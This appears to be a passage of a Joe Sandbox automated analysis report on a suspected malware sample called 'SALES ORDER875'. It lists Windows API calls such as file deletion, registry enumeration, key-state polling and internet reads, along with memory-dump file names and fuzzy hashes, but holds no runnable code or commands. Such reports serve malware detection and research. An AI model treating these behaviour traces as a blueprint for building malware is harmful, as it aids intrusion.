                                                                                                                                                                                    • Instruction ID: 826808be55e6a88b2145f135dcb1dba6940313b238cd3a8d393171574e51ba44
                                                                                                                                                                                    • Opcode Fuzzy Hash: 64bb2b178e14026ab144c55d04e138a396849992b63a306c402e7edee129bdba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 84E0CD35B82723BBD2332F257C58B9F6654AF81F637064165FC04E2104DB64DD0145A8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003C3CDE,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384E62
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00384E74
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,003C3CDE,?,00451418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00384E87
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                    • API String ID: 145871493-1355242751
                                                                                                                                                                                    • Opcode ID: a0a20c939f9e087296ed4ff01522834f137792fd11500b5fbfb6b3c1a9833d71
                                                                                                                                                                                    • Instruction ID: 22838542a130ebd635c9e445b1efd8da56682948f1445d1a6b355102a30d251e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0a20c939f9e087296ed4ff01522834f137792fd11500b5fbfb6b3c1a9833d71
                                                                                                                                                                                    • Instruction Fuzzy Hash: FAD0C231682722B756232B247C08FCB2A18AF81F123064261B804E2514CF24DD018AD8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F2C05
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 003F2C87
                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003F2C9D
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F2CAE
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F2CC0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Delete$Copy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3226157194-0
                                                                                                                                                                                    • Opcode ID: 1ddcb9b54a08a18a6b4af58bfa157942e5be305a8dd05f8e298ce33f8a67d41d
                                                                                                                                                                                    • Instruction ID: 99b036b1ee9e84f9417283eb33e1a773eac46b00d1ea659f40e554b40c376b0f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ddcb9b54a08a18a6b4af58bfa157942e5be305a8dd05f8e298ce33f8a67d41d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 13B10C71D0011DABDF16EBA4CC85EEFBB7DEF49350F1040A6F609EA151EA319A448F61
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040A427
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040A435
                                                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0040A468
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040A63D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                                                    • Opcode ID: 8dee3e1a63defe123fe8c0842f0349797f825cf9e45b25713ced042b238832e2
                                                                                                                                                                                    • Instruction ID: 3c0706cd4aae66551d5d4332147620f93f762a4d5802c3c2a3a5729aad0f2a9b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dee3e1a63defe123fe8c0842f0349797f825cf9e45b25713ced042b238832e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BA1C371604300AFD720DF24D886F2AB7E1AF44714F14886DF59A9B3D2D774EC418B92
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003ECF22,?), ref: 003EDDFD
                                                                                                                                                                                      • Part of subcall function 003EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003ECF22,?), ref: 003EDE16
                                                                                                                                                                                      • Part of subcall function 003EE199: GetFileAttributesW.KERNEL32(?,003ECF95), ref: 003EE19A
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 003EE473
                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 003EE4AC
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003EE5EB
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003EE603
                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 003EE650
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3183298772-0
                                                                                                                                                                                    • Opcode ID: 4d9662ac7690e7afcb8eaf54246b31a4243aa7202810ee1eecd8b68f5673bf97
                                                                                                                                                                                    • Instruction ID: ac7cd5f7be823b56d47655155722e3340de1988e89518fd19bfa2ce0cf52364d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d9662ac7690e7afcb8eaf54246b31a4243aa7202810ee1eecd8b68f5673bf97
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5751B6B24083955BC726EB91DC81ADF73ECAF85340F004A1EF589D71D1EF74A5888B56
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                      • Part of subcall function 0040C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040B6AE,?,?), ref: 0040C9B5
                                                                                                                                                                                      • Part of subcall function 0040C998: _wcslen.LIBCMT ref: 0040C9F1
                                                                                                                                                                                      • Part of subcall function 0040C998: _wcslen.LIBCMT ref: 0040CA68
                                                                                                                                                                                      • Part of subcall function 0040C998: _wcslen.LIBCMT ref: 0040CA9E
                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040BAA5
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0040BB00
                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0040BB63
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0040BBA6
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040BBB3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 826366716-0
                                                                                                                                                                                    • Opcode ID: c2c14156f6d201794e060992e83c7f0aa05f207260b6ae8184d863b940c853d6
                                                                                                                                                                                    • Instruction ID: 44738eba3a51e9e5b1176c445248ac54d3ec2c290a3a7ef89eec6588866c1433
                                                                                                                                                                                    • Opcode Fuzzy Hash: c2c14156f6d201794e060992e83c7f0aa05f207260b6ae8184d863b940c853d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7861AD31208201AFD715DF14C890E2ABBF5FF84308F1485AEF4999B2A2DB35ED45CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003E8BCD
                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 003E8C3E
                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 003E8C9D
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003E8D10
                                                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003E8D3B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4136290138-0
                                                                                                                                                                                    • Opcode ID: 68e7c666c9108190b9b67d8d95e696f816cd37d1f15e5e1cd8c47176287365fb
                                                                                                                                                                                    • Instruction ID: e8bbd7154aab20264564438c1b3dd9994420059e9617b55713604f0f6c7b79d8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68e7c666c9108190b9b67d8d95e696f816cd37d1f15e5e1cd8c47176287365fb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E518BB5A00619EFCB14CF69C884AAAB7F9FF89314B118569F909DB350E730E911CF90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003F8BAE
                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 003F8BDA
                                                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003F8C32
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003F8C57
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003F8C5F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                                                                    • Opcode ID: f1b39368891941fe904020080f9a437061437ba520f52f7502bdf6914fb02907
                                                                                                                                                                                    • Instruction ID: efb80f23fc6fdc80884d51487650477f989c073ab91d35a911cad1ccfe6a1bf4
                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b39368891941fe904020080f9a437061437ba520f52f7502bdf6914fb02907
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09515F35A002199FCB05DF64C880A6DBBF5FF49314F198498E949AB362CB31ED41CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00408F40
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00408FD0
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408FEC
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00409032
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00409052
                                                                                                                                                                                      • Part of subcall function 0039F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,003F1043,?,753CE610), ref: 0039F6E6
                                                                                                                                                                                      • Part of subcall function 0039F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,003DFA64,00000000,00000000,?,?,003F1043,?,753CE610,?,003DFA64), ref: 0039F70D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 666041331-0
                                                                                                                                                                                    • Opcode ID: 96d52935a2d44958a352eeea625269f21304acbd34bed5b6ef5995bbd8e1b241
                                                                                                                                                                                    • Instruction ID: 671aa0392e0708f24a318f91b618615520dbaf41cb4b326f5174af1bcc75589a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96d52935a2d44958a352eeea625269f21304acbd34bed5b6ef5995bbd8e1b241
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC512C35604205DFC715EF64C4849AEBBF1FF49314B0880A9E849AF3A2DB35ED86CB95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00416C33
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00416C4A
                                                                                                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00416C73
                                                                                                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,003FAB79,00000000,00000000), ref: 00416C98
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00416CC7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3688381893-0
                                                                                                                                                                                    • Opcode ID: e1c7262988624261e2bfe725b8b7de465d6bee7d5a1d759eed2d04f91b385b2f
                                                                                                                                                                                    • Instruction ID: 1467af05b1de2a8ec0d7676e0ff478617fbc3c726c3b13ddcdb0f942c42630de
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1c7262988624261e2bfe725b8b7de465d6bee7d5a1d759eed2d04f91b385b2f
                                                                                                                                                                                    • Instruction Fuzzy Hash: B741EA35604114AFD724CF28CC94FEA7BA5EB09350F16426AF955A73E0E375ED81CA88
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                    • Opcode ID: 120135539b793caf2b5e212e351c2bea675392a6b8e48d52be3274a2681af945
                                                                                                                                                                                    • Instruction ID: 17af8d3ea08abb313644ed901a14bfe1e3bdae18eaca00bab39b5355230b56f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 120135539b793caf2b5e212e351c2bea675392a6b8e48d52be3274a2681af945
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C41D672E002009FCB25DF78C881A9EB7A5EF89318F164668E615EF755DB31AD01CB80
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00399141
                                                                                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 0039915E
                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00399183
                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0039919D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                                                    • Opcode ID: 0aebd25bb65fd105fc073c3916fec298d41ab0b0c92c7ed962e463f3993d2e53
                                                                                                                                                                                    • Instruction ID: 8fa0c92fb9cea87a8679f5f86daf746b4ad8b10b410442701cae415cb0ede770
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0aebd25bb65fd105fc073c3916fec298d41ab0b0c92c7ed962e463f3993d2e53
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9341A131A0821AFBDF069F68D844BEEB774FF05324F20832AE425A72D0D7746990CB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetInputState.USER32 ref: 003F38CB
                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 003F3922
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 003F394B
                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 003F3955
                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003F3966
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2256411358-0
                                                                                                                                                                                    • Opcode ID: b5e4ad91140a5d7089e2f30fbf3ea9090309487b42869eada386fae13cfad745
                                                                                                                                                                                    • Instruction ID: dafafd727c7f566f2120cd0f4567f36329106a00aa6d630f9ec8ca75845a9a15
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5e4ad91140a5d7089e2f30fbf3ea9090309487b42869eada386fae13cfad745
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3331C27094434AAEEB37CB34DC58BB73BA8AB05345F05457DEA62821A1E3F4DA84CB15
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,003FC21E,00000000), ref: 003FCF38
                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 003FCF6F
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,003FC21E,00000000), ref: 003FCFB4
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,003FC21E,00000000), ref: 003FCFC8
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,003FC21E,00000000), ref: 003FCFF2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3191363074-0
                                                                                                                                                                                    • Opcode ID: 441f210978063201eec06e86efb41fd356649d89a3015ab2cdf3b0779b2c34bc
